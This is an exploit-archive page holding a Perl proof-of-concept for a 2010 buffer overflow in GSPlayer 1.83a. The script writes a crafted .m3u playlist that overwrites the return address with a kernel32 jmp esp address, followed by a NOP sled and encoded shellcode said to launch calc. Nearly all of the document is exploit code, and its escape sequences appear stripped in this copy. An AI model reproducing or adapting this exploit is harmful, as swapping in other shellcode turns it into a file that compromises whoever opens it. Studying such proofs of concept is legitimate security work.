GSPlayer 1.83a Win32 Release Buffer Overflow Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : GSPlayer 1.83a Win32 Release Buffer Overflow Vulnerability
# Published : 2010-11-04
# Author : moigai
# Previous Title : Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow (Friendly Version)
# Next Title : Minishare 1.5.5 Buffer Overflow Vulnerability (SEH)

# Exploit Title: GSPlayer 1.83a Win32 Release Buffer Overflow Vulnerability
# Date: 2010/11/04
# Author: moigai
# e-mail: again.liu@gmail.com
# Software Link: http://www.vector.co.jp/download/file/win95/art/fh296344.html
# Version: 1.83a Win32 Release
# Tested on: Windows XP SP3 En (VM)

my $file = "GSPlayer.m3u";

my $junk1 = "x41" x 257;

#jmp esp from kernel32.dll
my $eip = pack('V',0x7C86467B);
my $junk2 = "Ai7Ai8Ai";
my $nop = "x90" x 30;

#executes calc
my $shell = 
"xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1" .
"x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30" .
"x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa" .
"x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96" .
"x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b" .
"xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a" .
"xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83" .
"x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98" .
"xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61" .
"xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05" .
"x7fxe8x7bxca";

my $payload = $junk1 . $eip . $junk2 . $nop . $shell;
my $rest = "x42" x (4064 - length($payload));
$payload = $payload . $rest . ".mp3";

print "n[+] Creating m3u filen";
open(FILE, ">$file");
print FILE $payload;
close(FILE);
print "[+] File " . $file . " createdn";